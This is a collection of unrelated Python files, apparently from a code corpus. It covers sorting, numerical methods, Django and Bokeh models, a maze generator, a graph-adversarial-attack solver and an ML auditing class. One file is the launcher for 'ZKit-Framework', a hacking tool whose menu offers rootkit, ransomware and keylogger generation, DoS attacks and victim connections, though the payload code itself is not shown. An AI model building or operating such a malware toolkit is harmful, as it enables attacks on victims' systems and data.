# parsed_sent=nlp2(bigramms_pred_sents[2371]) #772,123,2371
# rule1=False
# for j,token in enumerate( parsed_sent):
# print(token.text, token.pos_, token.tag_, token.dep_)
# if token.dep_=='nsubj' and token.tag_=='NN':
# rule1=True
# if rule1 and token.pos_=='VERB':
# rule1=False
# if token.text=='be':
# parse_pred_sent.append('is')
# continue
# if token.text=='have':
# parse_pred_sent.append('has')
# continue
# if token.text==token.lemma_:
# parse_pred_sent.append(token.text+'s')
# continue
# parse_pred_sent.append(token.text)
# print(' '.join(parse_pred_sent))
| python |
"ZKit-Framework Github : https://github.com/000Zer000/ZKit-Framework"
# Copyright (c) 2020, Zer0 . All rights reserved.
# This Work Is Licensed Under Apache Software License 2.0 More
# Can Be Found In The LICENSE File.
__author__ = "Zer0"
__version__ = "1.4.5"
__license__ = "Apache Software License 2.0"
__status__ = "Production"
import os
from datetime import datetime as dt
import sys
def start():
"Starts zkit with those beautiful menues"
try:
try:
# Doing some imports
from core.helper_core import notify, Color, Generate, dos, \
ctrler, helpbanner, init, print_banner, list_builtin_payloads, search_for_payloads, crash_handler
except (ImportError, ModuleNotFoundError) as value:
# Ops ! Sth is missing
print(
"One Or Some On Requirments Not Found . Please Install Them And Try Again ."
+ "Python Threw : "
+ str(value)
)
raise
# Printing A Banner More Coming Soon
_, red, green, yellow, blue, magenta, cyan, _, reset = Color().GetAllColors()
init()
print_banner()
# Hard And Boring Code
print(
"\t " * 5 + "Hacking is" + red + " C " + green + "O " + blue + "L " +
yellow + "O " + magenta + "R " + green +
"F " + red + "U " + magenta + "L " + reset
)
print(
"Available Options Are or Enter '?' To get a summery about notes of using this framework:\n"
+ red + " {1} --> Create A RootKit\n"
+ green + " {2} --> Create A Ransomware (Beta)\n"
+ blue + " {3} --> Create A KeyLogger \n"
+ yellow + " {4} --> Run A Dos Attack\n"
+ magenta + " {5} --> Connect To A Victim\n"
+ red + " {6} --> Generate Your User Payloads\n"
+ cyan + " {000}" + "--> Exit ZKit-Framework\n" + reset
)
while True:
try:
choice = str(input("..> "))
if choice == "000":
break
if choice == "?":
print(helpbanner)
elif choice == "1":
payloads = list_builtin_payloads('rootkit')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice == "2":
print(
"This Feature (Ransomware) is beta and have not tested . continue anyway ? (Y/N) : ", end="")
agreed = True if str(
input("")).lower().strip() == "y" else False
if agreed:
payloads = list_builtin_payloads('ransomware')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
else:
print("Ignoring . Back To Main Menu.")
elif choice == "3":
payloads = list_builtin_payloads('keylogger')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice == "4":
dos.main()
elif choice == "5":
ctrler.Main()
elif choice == "6":
payloads = list_payloads()
if len(payloads) == 0:
print(
"No User Payload Was Found . Please Download one from zkit-market or make one using zkit-payload-template")
else:
print("Please Choose One Of Them (Number Of It): ", end="")
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice is not None:
notify(
"problem", "Invalid Input {" + "{}".format(choice) + "}")
except (KeyboardInterrupt, EOFError):
print("\nPlease Type '000' To Exit ZKit-Framework\n")
choice = None
except BaseException as e:
crash_handler(e)
start()
| python |
# Implement Bubble Sort
import time
# we have a data set starting with the very basic happy path to complex
data = {
"data1" : [5,4,1,3,2], # happy path easy to vizualize
"data2" : [5,4,1999,3,2,8,7,6,10,100], #larger range of values
"data3" : [5,4,1,3,2,2], # repeated values
"data4" : [1,1,1,1,1,1], # every element is the same
"data5" : [0,22,100,1,2,3,4,5,6,7,7,8,89,9,0,-1], #negative + zero
"data6" : [5,4,3,2,1], #reverse sorted array
"data7" : [1], # data with only 1 value
"data8" : [], # data with NULL value
"data9" : [4,2,1,6,2,10,4,3,10,6,5,6,7,2,10,10,4,6,5,8],
}
#-----------------------------------------------------------------------------#
# INSERTION SORTING
#-----------------------------------------------------------------------------#
def top_k(arr, k):
result = []
# for left_ptr in range(len(arr)-1):
# # result_dict[arr[left_ptr]] = 1
# curr_ptr = left_ptr + 1
# # go backwards in the array
# for curr_ptr in range(curr_ptr,0,-1):
# # if arr[curr_ptr] > arr[curr_ptr - 1] and arr[curr_ptr] not in arr[:curr_ptr]:
# if arr[curr_ptr] > arr[curr_ptr - 1]:
# arr[curr_ptr], arr[curr_ptr - 1] = arr[curr_ptr - 1], arr[curr_ptr]
arr.sort(reverse = True)
ptr = 0
while len(result) < k and ptr < len(arr):
if(ptr == 0 or arr[ptr] != arr[ptr-1]):
result.append(arr[ptr])
ptr += 1
return result
if __name__ == "__main__":
# Call the dataset to test Insertion sort
k = 4
for i in range(len(data)):
start_time = time.time()
print(top_k(data["data"+str(i+1)],k))
print("Insertion time for data" + str(i+1) + " = "+ str(time.time() - start_time)) | python |
import numpy as np
import time
from numba import njit, prange
def exact_solver_wrapper(A_org, Q, p, L, delta_l, delta_g, constr='1'):
"""
Exact attacks for A^1, A^2 or A^{1+2}
param:
A_org: original adjacency matrix
Q: matrix, Q_i = Q[i]
p: vector
L: matrix, L_i = L[i]
delta_l: row budgets. If it is a scalar, expand to list with same value
delta_g: global budgets
constr: '1' (local budget solver) or '1+2' (local+global budget solver) or '2'
return:
unpert_val: function value under A_org (if constr='1', this is a vector)
opt_val: function value under A_pert (if constr='1', this is a vector)
A_pert: optimal attacking adjacency matrix
"""
if constr == '1':
# Exact attacks for A^1
return local_budget_solver(A_org, Q, p, L, delta_l, delta_g)
elif constr == '1+2':
# Exact attacks for A^{1+2}
return dp_solver(A_org, Q, p, L, delta_l, delta_g)
elif constr == '2':
# Exact attacks for A^2
raise NotImplementedError('Exact attacks for A^2 is not implemented!')
@njit("(float64[:, :], float64[:, :], float64[:], float64[:, :], int64)", parallel=False, fastmath=True, cache=True)
# # @njit(parallel=True, fastmath=True)
# # @njit
def local_budget_precompute(A_org, Q, p, L, delta_l):
"""
solver of equation 8&11 of the paper when activation is identity, max_margin loss and average pooling
"""
nG = A_org.shape[0]
a = np.zeros((nG+1, delta_l+1)) # matrix a for described in equation 6
add_edge_matrix = np.zeros((nG+1, delta_l+1))
for i in range(1, nG+1): # looping each row of A
A_i = A_org[i-1,:]
A_i_edges = int(np.sum(A_i))
Q_i = Q[i-1]
L_i = L[i-1]
max_edges = min(A_i_edges + delta_l + 1, nG)
min_edges = max(A_i_edges - delta_l + 1, 1)
possible_denomi = max_edges - min_edges + 1
chunk_edges_mtx, chunk_no_edges_mtx = np.zeros((possible_denomi,delta_l+1)), np.zeros((possible_denomi,delta_l+1))
for x in range(min_edges, max_edges+1): # looping all possible (1'A_i + 1)
V_L = Q_i + L_i*x
indices = np.argsort(V_L)
chunk_edges, chunk_no_edges = [0.0]*(delta_l+1), [0.0]*(delta_l+1)
temp_idx = 1
for y in indices:
if temp_idx > delta_l: break
if y == i-1: continue # excluding self edge
if A_i[y] == 0:
chunk_no_edges[temp_idx] = V_L[y] + chunk_no_edges[temp_idx-1]
temp_idx += 1
temp_idx = 1
for y in indices[::-1]:
if temp_idx > delta_l: break
if y == i-1: continue # excluding self edge
if A_i[y] == 1:
chunk_edges[temp_idx] = V_L[y] + chunk_edges[temp_idx-1]
temp_idx += 1
chunk_edges_mtx[x - min_edges] = chunk_edges
chunk_no_edges_mtx[x - min_edges] = chunk_no_edges
A_V_i = np.dot(A_i, Q_i) + Q_i[i-1] + p[i-1]
A_L_i = np.dot(A_i, L_i)
a[i,0] = A_V_i/(A_i_edges+1) + A_L_i
for j in range(1,delta_l+1): # looping each possible local constraint
min_f = np.inf
for k in range(j+1): # looping different combinations of adding/removing
add_edges, remove_edges = k, j-k
if A_i_edges+add_edges > nG-1 or A_i_edges-remove_edges < 0:
continue
new_edges = A_i_edges+add_edges-remove_edges + 1
f = A_V_i + A_L_i*new_edges
# adding k edges from chunk of A_i=0 in ascent order
if add_edges > 0:
# print(chunk_no_edges_mtx[new_edges][add_edges])
f += chunk_no_edges_mtx[new_edges - min_edges][add_edges]
# removing j-k edges from chunk of A_i=1 in descent order
if remove_edges > 0:
# print(chunk_edges_mtx[new_edges][remove_edges])
f -= chunk_edges_mtx[new_edges - min_edges][remove_edges]
final_f = f/new_edges
if final_f < min_f:
min_f = final_f
sol = (min_f, add_edges)
a[i,j], add_edge_matrix[i,j] = sol
return a, add_edge_matrix
@njit("(float64[:], float64[:], float64[:], int64, int64, int64)", cache=True)
def get_A_opt(Q_i, A_i, L_i, i, j, add_edges):
A_i_edges = np.sum(A_i)
remove_edges = j - add_edges
new_edges = A_i_edges+add_edges-remove_edges + 1
V_L = Q_i + L_i.T*new_edges
indices = np.argsort(V_L)
A_new_i = A_i.copy()
added_edges = 0
for y in indices:
if added_edges == add_edges: break
if y == i-1: continue # excluding self edge
if A_i[y] == 0:
A_new_i[y] = 1
added_edges += 1
removed_edges = 0
for y in indices[::-1]:
if removed_edges == remove_edges: break
if y == i-1: continue # excluding self edge
if A_i[y] == 1:
A_new_i[y] = 0
removed_edges += 1
return A_new_i
@njit("(float64[:,:], float64[:,:], float64[:], float64[:,:], int64[:], int64)", cache=True)
def dp_solver(A_org, Q, p, L, delta_l, delta_g):
"""
DP for solving min_{A_G^{1+2}} \sum_i [(A_i+e_i)@Q_i + p_i]/(1'A_i + 1) + A_i@L_i]
Algorithm 1:
1. Precomputing matrix a
2. DP to get matrix s
3. Tracing back
Complexity: nG^2*delta_l*log(nG) + nG*delta_l^2 + nG^2*delta_l^2
param:
A_org: original adjacency matrix
Q: matrix, Q_i = Q[i]
p: vector
L: matrix, L_i = L[i]
delta_l: row budgets
delta_g: global budgets
"""
# start = time.time()
max_delta_l = max(delta_l)
a, add_edge_matrix = local_budget_precompute(A_org, Q, p, L, max_delta_l)
# print(f'Precomputation of matrix a: {time.time() - start}')
# ---------------------FIRST LOOP---------------------
nG = A_org.shape[0]
c = [0]*(nG+1)
for t in range(1, nG+1):
c[t] = min(c[t-1]+delta_l[t-1], delta_g)
s = [np.array([0.0]*(i+1)) for i in c]
# s = np.zeros((nG+1, min(nG*np.max(delta_l), delta_g)+1))
for t in range(1, nG+1):
st_1, st, at = s[t-1], s[t], a[t]
for j in range(0,c[t]+1):
m = np.inf
for k in range(max(0, j-c[t-1]), min(j, delta_l[t-1])+1):
m = min(st_1[j-k]+at[k], m) # accessing s seems costly
st[j] = m
# ---------------------SECOND LOOP---------------------
A_pert = np.zeros((nG,nG))
j = np.argmin(s[nG]) # this sort takes nG*delta_l log(nG*delta_l)
opt_val = s[nG][j]
unpert_val = s[nG][0]
for t in range(nG,0,-1):
temp = np.ones(delta_l[t-1]+1)*np.inf
st_1, at = s[t-1], a[t]
for k in range(max(0, j-c[t-1]), min(j, delta_l[t-1])+1):
temp[k] = st_1[j-k] + at[k]
kt = np.argmin(temp)
j = j - kt
A_pert[t-1,:] = get_A_opt(Q[t-1], A_org[t-1], L[t-1], \
t, kt, add_edge_matrix[t][kt])
sol = (unpert_val, opt_val, A_pert)
return sol
@njit("(float64[:,:], float64[:,:], float64[:], float64[:,:], int64[:], int64)", cache=True)
def local_budget_solver(A_org, Q, p, L, delta_l, delta_g):
max_delta_l = max(delta_l)
a, add_edge_matrix = local_budget_precompute(A_org, Q, p, L, max_delta_l)
nG = A_org.shape[0]
A_pert = np.zeros((nG,nG))
opt_fvals = np.zeros(nG)
for i in range(nG):
delta_l_i = delta_l[i]
best_delta_l = np.argmin(a[i+1][0:(delta_l_i+1)])
A_pert[i] = get_A_opt(Q[i], A_org[i], L[i], i+1, best_delta_l, \
add_edge_matrix[i+1][best_delta_l])
opt_fvals[i] = a[i+1][best_delta_l]
sol = (a[:, 0], opt_fvals, A_pert)
return sol
def po_dp_solver(A_org, R, delta_l, delta_g):
nG = A_org.shape[0]
# precomputing a matrix
J = R*(-2*A_org + 1)
a = po_local_solver(J, nG, delta_l)
A_pert = np.zeros((nG,nG))
V_pert = np.zeros((nG,nG))
c, s = first_loop(a, delta_l, delta_g)
j = np.argmin(s[nG])
unpert_val = s[nG][0]
opt_val = s[nG][j]
for t in range(nG,0,-1):
temp = np.ones(delta_l+1)*np.inf
st_1, at = s[t-1], a[t]
for k in range(max(0, j-c[t-1]), min(j, delta_l)+1):
temp[k] = st_1[j-k] + at[k]
kt = np.argmin(temp)
j = j - kt
V_pert[t-1,:] = optVt_from_a_tj(J[t-1, :], t, kt, delta_l)
A_pert[t-1,:] = ((2*A_org[t-1, :] - 1)*(-2*V_pert[t-1,:]+1)+1)/2
return A_pert
def po_local_solver(J, nG, delta_l):
a = np.zeros((nG+1, delta_l+1))
for i in range(1, nG+1): # looping each row of A
J_i = J[i-1, :].copy()
J_i = -np.delete(J_i, i-1)
indices = np.argsort(J_i)
for j in range(1,delta_l+1): # looping each possible local constraints
a[i,j] = J_i[indices[j-1]] + a[i,j-1]
return a
def optVt_from_a_tj(J_t, t, j, delta_l):
V = np.zeros(J_t.shape)
indices = np.argsort(-J_t)
changed_edges = 0
for i in range(j+1):
if indices[i] == t-1: continue
V[indices[i]] = 1
changed_edges += 1
if changed_edges >= j: break
return V
| python |
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
# Create your models here.
class UserProfileManager(BaseUserManager):
"""Manager for User Profile Model"""
def create_user(self, email, name, mobile_no, password=None, is_supervisor=False, is_gaurd=False):
"""Create new user profile"""
if not email:
raise ValueError("User must have email address")
email = self.normalize_email(email)
user = self.model(email=email,name=name,mobile_no=mobile_no,is_supervisor=is_supervisor,is_gaurd=is_gaurd)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, mobile_no, password):
"""Create and Save New SuperUser with given Details"""
user = self.create_user(email, name, mobile_no, password)
user.is_superuser = True
user.is_staff = True
user.is_supervisor = True
user.is_gaurd = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser, PermissionsMixin):
"""Database model for users in the System"""
id = models.AutoField(primary_key=True)
email = models.EmailField(max_length=255,unique=True)
name = models.CharField(max_length=255)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
mobile_no = models.CharField(max_length=12)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
is_supervisor = models.BooleanField(default=False)
is_gaurd = models.BooleanField(default=False)
is_demo_account = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name','mobile_no']
def get_full_name(self):
"""Retrieve Full Name of User"""
return self.first_name+' '+self.last_name
def get_short_name(self):
"""Retrieve Short Name of User"""
return self.name
def get_contact_details(self):
"""Retrieve Contact Details of the User"""
return 'Email ID: {} Mobile No: {}'.format(self.email, self.mobile_no)
def __str__(self):
"""Return Representation of User"""
return self.email
| python |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from unittest import TestCase
import os
from auxlib.packaging import get_version
# from auxlib.packaging import (_get_version_from_pkg_info, _is_git_dirty, _get_most_recent_git_tag,
# _get_git_hash, is_git_repo)
# from auxlib.path import ROOT_PATH
# class TestPackaging(TestCase):
#
# def test_version_string(self):
# try:
# test_version = str(random.randint(0,1e6))
# with open('.version', 'w') as f:
# f.write(test_version)
# assert _get_version_from_pkg_info('tests') == test_version
# finally:
# if os.path.exists('.version'):
# os.remove('.version')
#
# def test_is_git_dirty(self):
# result = _is_git_dirty(os.getcwd())
# assert result is True or result is False
#
#
# def test_get_git_hash(self):
# hash = _get_git_hash(os.getcwd())
# assert len(hash) == 7
#
# def test_not_git_repo(self):
# assert not is_git_repo(ROOT_PATH)
class TestPackagingNotGitRepo(TestCase):
def setUp(self):
super(TestPackagingNotGitRepo, self).setUp()
self.cwd = os.getcwd()
os.chdir('/')
def tearDown(self):
super(TestPackagingNotGitRepo, self).tearDown()
os.chdir(self.cwd)
def test_get_most_recent_git_tag_no_repo(self):
tag = get_version(os.getcwd())
assert tag is None
| python |
from rest_framework import serializers
from daily_tracker.models import Attandance
class AttandanceSerializer(serializers.HyperlinkedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='api:attandance-detail')
class Meta:
model = Attandance
fields = ('id', 'enter_at', 'out_at', 'total_time', 'url')
| python |
import numpy as num
from decimal import *
import scipy as sci
from numpy.polynomial import polynomial as pol
def euler(f,a,b,n ,y_0):
h=Decimal((b-a))/Decimal(n)
vals = []
vals.append(y_0)
print ("Indice\t | t | Aproximado(u) ")
print("0\t | 0 |\t"+str(y_0))
for i in range (0, n-1):
tj =Decimal(a+(i)*h)
x = vals[i] + h*f(tj,Decimal(vals[i]))
vals.append(x)
print(str(i+1)+"\t | "+str(tj)+" |"+"\t"+str(x))
"""print("u_",i+1,"=",x)"""
def f(t,x):
return -x + t + 1
f0 = 1
euler(f,0,1,10,f0)
| python |
from __future__ import absolute_import
import inspect
from textwrap import dedent
from types import FunctionType
from ..core.properties import Bool, Dict, Either, Int, Seq, String, AnyRef
from ..model import Model
from ..util.dependencies import import_required
from ..util.compiler import nodejs_compile, CompilationError
class Filter(Model):
''' A Filter model represents a filtering operation that returns a row-wise subset of
data when applied to a ColumnDataSource.
'''
filter = Either(Seq(Int), Seq(Bool), help="""
A list that can be either integer indices or booleans representing a row-wise subset of data.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "filter" not in kw:
kw["filter"] = args[0]
super(Filter, self).__init__(**kw)
class IndexFilter(Filter):
''' An IndexFilter filters data by returning the subset of data at a given set of indices.
'''
indices = Seq(Int, help="""
A list of integer indices representing the subset of data to select.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "indices" not in kw:
kw["indices"] = args[0]
super(IndexFilter, self).__init__(**kw)
class BooleanFilter(Filter):
''' A BooleanFilter filters data by returning the subset of data corresponding to indices
where the values of the booleans array is True.
'''
booleans = Seq(Bool, help="""
A list of booleans indicating which rows of data to select.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "booleans" not in kw:
kw["booleans"] = args[0]
super(BooleanFilter, self).__init__(**kw)
class GroupFilter(Filter):
''' A GroupFilter represents the rows of a ColumnDataSource where the values of the categorical
column column_name match the group variable.
'''
column_name = String(help="""
The name of the column to perform the group filtering operation on.
""")
group = String(help="""
The value of the column indicating the rows of data to keep.
""")
def __init__(self, *args, **kw):
if len(args) == 2 and "column_name" not in kw and "group" not in kw:
kw["column_name"] = args[0]
kw["group"] = args[1]
super(GroupFilter, self).__init__(**kw)
class CustomJSFilter(Filter):
''' Filter data sources with a custom defined JavaScript function.
.. warning::
The explicit purpose of this Bokeh Model is to embed *raw JavaScript
code* for a browser to execute. If any part of the code is derived
from untrusted user inputs, then you must take appropriate care to
sanitize the user input prior to passing to Bokeh.
'''
@classmethod
def from_py_func(cls, func):
''' Create a CustomJSFilter instance from a Python function. The
fucntion is translated to JavaScript using PScript.
The ``func`` function namespace will contain the variable ``source``
at render time. This will be the data source associated with the CDSView
that this filter is added to.
'''
if not isinstance(func, FunctionType):
raise ValueError('CustomJSFilter.from_py_func only accepts function objects.')
pscript = import_required(
'pscript',
dedent("""\
To use Python functions for CustomJSFilter, you need PScript
'("conda install -c conda-forge pscript" or "pip install pscript")""")
)
argspec = inspect.getargspec(func)
default_names = argspec.args
default_values = argspec.defaults or []
if len(default_names) - len(default_values) != 0:
raise ValueError("Function may only contain keyword arguments.")
# should the following be all of the values need to be Models?
if default_values and not any(isinstance(value, Model) for value in default_values):
raise ValueError("Default value must be a plot object.")
func_kwargs = dict(zip(default_names, default_values))
code = pscript.py2js(func, 'filter') + 'return filter(%s);\n' % ', '.join(default_names)
return cls(code=code, args=func_kwargs)
@classmethod
def from_coffeescript(cls, code, args={}):
''' Create a CustomJSFilter instance from CoffeeScript snippets.
The function bodies are translated to JavaScript functions using node
and therefore require return statements.
The ``code`` function namespace will contain the variable ``source``
at render time. This will be the data source associated with the CDSView
that this filter is added to.
'''
compiled = nodejs_compile(code, lang="coffeescript", file="???")
if "error" in compiled:
raise CompilationError(compiled.error)
else:
return cls(code=compiled.code, args=args)
args = Dict(String, AnyRef, help="""
A mapping of names to Python objects. In particular those can be bokeh's models.
These objects are made available to the callback's code snippet as the values of
named parameters to the callback.
""")
code = String(default="", help="""
A snippet of JavaScript code to filter data contained in a columnar data source.
The code is made into the body of a function, and all of of the named objects in
``args`` are available as parameters that the code can use. The variable
``source`` will contain the data source that is associated with the CDSView this
filter is added to.
The code should either return the indices of the subset or an array of booleans
to use to subset data source rows.
Example:
.. code-block:: javascript
code = '''
var indices = [];
for (var i = 0; i <= source.data['some_column'].length; i++){
if (source.data['some_column'][i] == 'some_value') {
indices.push(i)
}
}
return indices;
'''
.. note:: Use ``CustomJS.from_coffeescript()`` for CoffeeScript source code.
""")
use_strict = Bool(default=False, help="""
Enables or disables automatic insertion of ``"use strict";`` into ``code``.
""")
| python |
import random
import sys
def room(map, times, max, min):
# map
width = len(map)
height = len(map[0])
# Storage generated rooms
rooms = []
for i in range(times):
sp = (random.randint(0, int((width-1)/2))*2+1,
random.randint(0, int((height-1)/2))*2+1)
length = random.randint(int(min/2), int(max/2))*2+1
room = (sp, length)
rooms.append(room)
# check if intersect
'''for r in rooms:
point = r[0]
l = r[1]
if sp[0]
'''
for r in rooms:
for i in range(r[0][0], r[0][0]+r[1]):
for j in range(r[0][1], r[0][1]+r[1]):
if 0 < i and i < width-1 and 0 < j and j < height-1:
map[i][j] = 4
return rooms
def open_door(map, rooms, door_ratio):
# map
width = len(map)
height = len(map[0])
for room in rooms:
# check each walls
isHasOneDoor = False
# top
for y in range(room[0][1], room[0][1]+room[1]):
x = room[0][0]-1
if 0 <= y and y <= height-1 and 0 <= x and x <= width-1 and x-1 >= 0 and map[x-1][y] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# down
for y in range(room[0][1], room[0][1]+room[1]):
x = room[0][0]+room[1]+1
if 0 <= y and y <= height-1 and 0 <= x and x <= width-1 and x+1 <= width-1 and map[x+1][y] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# left
for x in range(room[0][0], room[0][0]+room[1]):
y = room[0][0]-1
if 0 <= x and x <= width-1 and 0 <= y and y <= height-1 and y-1 >= 0 and map[x][y-1] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# right
for x in range(room[0][0], room[0][0]+room[1]):
y = room[0][0]+room[1]+1
if 0 <= x and x <= width-1 and 0 <= y and y <= height-1 and y+1 <= width-1 and map[x][y+1] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
def maze(height, width, rooms_count, room_max_length, room_min_length, door_ratio):
# 0 unvisited road
# 1 unvisited wall
# 2 visited road
# 3 visited wall
# 4 room district
# Generate maze map
map = [[1 for i in range(height)] for i in range(width)]
for i in range(1, width):
for j in range(1, height-1):
if j % 2 != 0 and i % 2 != 0:
map[i][j] = 0
# shuffle some rooms
rooms = room(map, rooms_count, room_max_length, room_min_length)
# shuffle a start point
sp = (random.randint(0, width-1), random.randint(0, height-1))
while map[sp[0]][sp[1]] != 0:
sp = (random.randint(0, width-1), random.randint(0, height-1))
point_list = []
# Start
map[sp[0]][sp[1]] = 2
point_list.append((sp[0]-1, sp[1], sp))
point_list.append((sp[0], sp[1]-1, sp))
point_list.append((sp[0]+1, sp[1], sp))
point_list.append((sp[0], sp[1]+1, sp))
# Loop for generation
while len(point_list) > 0:
# shuffle a point in list
point = point_list[random.randint(0, len(point_list)-1)]
# check shuffle availability
if not (0 <= point[0] and point[0] <= width-1 and 0 <= point[1] and point[1] <= height-1):
point_list.remove(point)
continue
# expand
road = point[2]
check_point = (point[0]-road[0]+point[0],
point[1]-road[1]+point[1])
if (0 <= check_point[0] and check_point[0] <= width-1 and 0 <= check_point[1] and check_point[1] <= height-1) and map[check_point[0]][check_point[1]] == 0:
map[check_point[0]][check_point[1]] = 2
map[point[0]][point[1]] = 2
# add around points of check_point
if check_point[0] >= 0 and map[check_point[0]-1][check_point[1]] == 1:
point_list.append(
(check_point[0]-1, check_point[1], check_point))
if check_point[0] <= width-1 and map[check_point[0]+1][check_point[1]] == 1:
point_list.append(
(check_point[0]+1, check_point[1], check_point))
if check_point[1] >= 0 and map[check_point[0]][check_point[1]-1] == 1:
point_list.append(
(check_point[0], check_point[1]-1, check_point))
if check_point[1] <= height-1 and map[check_point[0]][check_point[1]+1] == 1:
point_list.append(
(check_point[0], check_point[1]+1, check_point))
# remove from list
point_list.remove(point)
# open door in room walls
open_door(map, rooms, door_ratio)
# output
for x in map:
for y in x:
if y == 0 or y == 2 or y == 4:
print(' ', end='')
else:
print('▉', end='')
print()
print()
args = sys.argv[1:]
maze(int(args[0]), int(args[1]), int(args[2]),
int(args[3]), int(args[4]), int(args[5]))
| python |
# -*- coding: utf-8 -*-
"""Main module."""
import warnings
from collections import Counter
from math import sqrt
import mlprimitives
import numpy as np
from mlblocks import MLPipeline
from scipy.stats import entropy
from sklearn import metrics
from sklearn.model_selection import KFold
from sklearn.neighbors import NearestNeighbors
import pandas as pd
from cardea.modeling.modeler import Modeler
class ModelAuditor():
__name__ = 'ModelAuditor'
def run_fold(self, features_train, target, feature_test, primitive, hyperparameters=None):
'''Runs Kfold cross-validation where it predicts all the primitives within the pipeline.
Args:
features_train: the training features.
features_test: the testing features.
target: a list of the folds targets.
primitive: the machine learning primitive to run.
hyperparameters: the hyperparameters of the given primitives.
Returns:
A list of the folds' results for the primitives that are passed.
'''
# assert that the features and targets have the same size
modeler = Modeler()
#pipeline = self.create_pipeline(primitive, hyperparameters)
pipeline = modeler.create_pipeline(primitive, hyperparameters)
last_block_in_pipeline = list(pipeline.blocks.values())[-1]
#Add an if statement based on the type of output for the last block (array, ndarray, DataFrame)
for output in last_block_in_pipeline.produce_output:
check_name = output['name'] == 'X' or output['name'] == 'y'
check_numpy = output['type'] == 'array' or output['type'] == 'ndarray'
check_pandas = output['type'] == 'DataFrame' or output['type'] == 'Series'
if check_name and (check_numpy or check_pandas):
features_train = pd.DataFrame(features_train)
feature_test = pd.DataFrame(feature_test)
target = pd.Series(target)
return modeler.fit_predict_model(features_train, target, feature_test, pipeline)
return None
def generate_kfolds(self, features, target, n_folds=10):
'''Creates Kfold cross-validation for the given features and targets
Args:
features: The features as a numpy array to create the k-folds for
target: a list of the folds targets
n_folds: the number of folds to create
Returns:
a tuple that consist of two values, the folds features and the folds targets
'''
kf = KFold(n_splits=n_folds, shuffle=True)
folds_features = []
folds_targets = []
for train_index, test_index in kf.split(features):
X_train = features[train_index]
X_test = features[test_index]
y_train = target[train_index]
y_test = target[test_index]
folds_features.append([X_train, X_test])
folds_targets.append([y_train, y_test])
return folds_features, folds_targets
def execute_pipeline(self, pipeline_primitives, features_train, target,
features_test, problem_type, hyperparameters = None,
with_intermediate = False):
'''Executes a pipeline and generates all the intermediates of the pipeline.
Args:
pipeline_primitives: Array of the pipeline primitives.
features_train: the training features data to run through the pipeline.
features_test: the testing features data to run through the pipeline.
target: The target of the training data to run through the pipeline.
problem_type: the type of the problem (classification or regression).
hyperparameters: the hyperparameters to run for the model
with_intermediate: A boolean to add or ignore the intermediates metrics.
Returns:
a tuple that consist of three values,the intermediates,
the folds features and the folds targets.
'''
pipeline_intermediates = []
if with_intermediate:
all_partial_primitives = [pipeline_primitives[:index] for index in range(1,len(pipeline_primitives) + 1)]
else:
all_partial_primitives = [pipeline_primitives]
for partial_primitives in all_partial_primitives:
pipeline_results = self.run_fold(features_train, target,
features_test, partial_primitives,
hyperparameters)
#if pipeline_results != None:
pipeline_intermediates.append(pipeline_results)
return pipeline_intermediates
def report_regression_result(self, actual, predicted):
'''Reports the prediction results for a regression model.
Args:
actual: A 1d list of the target variable for the actual test data.
predicted: A 1d list of the prediction result.
Returns:
A json object of various evaluation metrics for regression.
'''
metrics_to_calculate = [['explained_variance_score', metrics.explained_variance_score],
['mean_absolute_error', metrics.mean_absolute_error],
['mean_squared_error', metrics.mean_squared_error],
['mean_squared_log_error', metrics.mean_squared_log_error],
['median_absolute_error', metrics.median_absolute_error],
['r2_score', metrics.r2_score]]
results_dict = {}
for metric in metrics_to_calculate:
try:
results_dict[metric[0]] = metric[1](actual, predicted)
except BaseException:
warnings.warn(
'{} can\'t be calculated for this data'.format(metric[0]),
UserWarning)
return results_dict
def report_classification_result(self, actual, predicted):
'''Reports the prediction results for a classification model.
Args:
actual: A 1d list of the target variable for the actual test data.
predicted: A 1d list of the prediction result.
n_class: Int of the number of classes in the classification problem.
prediction_proba: The classes prediction probabilities that are
produced by predict_proba.
Returns:
A json object of various evaluation metrics for classification.
'''
metrics_to_calculate = [['accuracy', metrics.accuracy_score],
['f1', metrics.f1_score],
['precision', metrics.precision_score],
['recall', metrics.recall_score],
['class_count', Counter]]
results_dict = {}
for metric in metrics_to_calculate:
try:
if metric[0] == 'accuracy':
results_dict[metric[0]] = metric[1](actual, predicted)
elif metric[0] == 'class_count':
counter_dict = metric[1](predicted)
label_count_sum = sum(counter_dict.values())
for label in counter_dict.keys():
results_dict['{}_{}'.format(metric[0], str(
label))] = counter_dict[label] / label_count_sum
else:
results_dict['{}_macro'.format(metric[0])] = metric[1](
actual, predicted, average='macro')
except BaseException:
warnings.warn(
'{} can\'t be calculated for this data'.format(metric[0]),
UserWarning)
return results_dict
def euclidean_distance(self, x, y):
'''Computes the euclidean distance between two vectors.
Args:
x: The first vector.
y: The second vector.
Returns:
The euclidean distance.
'''
return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))
def intermediate_metrics(self, intermediate):
'''Generates metrics of the intermediates (features data in-between primitives).
Args:
intermediate: The intermediate data that must be investigated (for a single fold).
Returns:
A Summary metrics for the different data columns in the intermediate.
'''
if type(intermediate) != pd.DataFrame:
intermediate = pd.DataFrame(intermediate)
